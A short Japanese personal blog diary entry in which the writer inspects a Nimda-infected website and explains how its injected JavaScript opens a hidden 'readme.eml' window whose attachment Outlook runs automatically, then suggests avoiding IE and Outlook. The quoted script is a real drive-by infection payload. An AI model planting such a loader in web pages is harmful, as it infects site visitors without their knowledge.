Yahooのニュースを見てたらNimda感染サイトの情報があったので、興味本位に見てみました(笑)。HP見ただけで感染するというのがどのような手段か見たかったのね。もちろんネスケで。
私はてっきりActiveXを使ってるんだと思ったんですが、テキもさるもの。
こんなJavascriptが。
<script language=”JavaScript”>
window.open(“readme.eml”, null, “resizable=no,top=6000,left=6000”)
</script>
拡張子emlはメールの書式にのっとったテキストファイルです。まずこれを開いています。ダウンロードしてみたところ、添付ファイルがあります。それがウィルス本体の実行ファイルでしょう。拡張子emlに対応しているのは通常メーラーですから、メーラーが起動します。Outlookの場合、添付ファイルを勝手に実行する機能がありやがりますので、見事感染します。
…よくできてる…。ActiveXならセキュリティレベルいぢればダウンロード、実行はしないけれど、普通Javascriptまで切る人はいませんからねぇ(最近はJavascriptとCookie要求されるサイト多いし)。まあ添付ファイルを勝手に実行しちまうのはOutlook(Express)くらいですからIEとOutlookの組み合わせ以外では「知らないうちに感染」はありえませんけど…。
上記は既に感染しているサイトでしたが、この添付ファイルを実行してしまうと今度は自分のコンピュータから他のコンピュータに攻撃を加えることになってしまいます。
ま、一番確実な防衛手段は「IEとOutlook使わない」ですな(笑)。せめてOutlookをやめれば添付ファイルを勝手に実行することはなくなります。元よりOutlookは重いし使いたいとは思いませんが…(自分はBecky)。
日記9/23
コメントを残す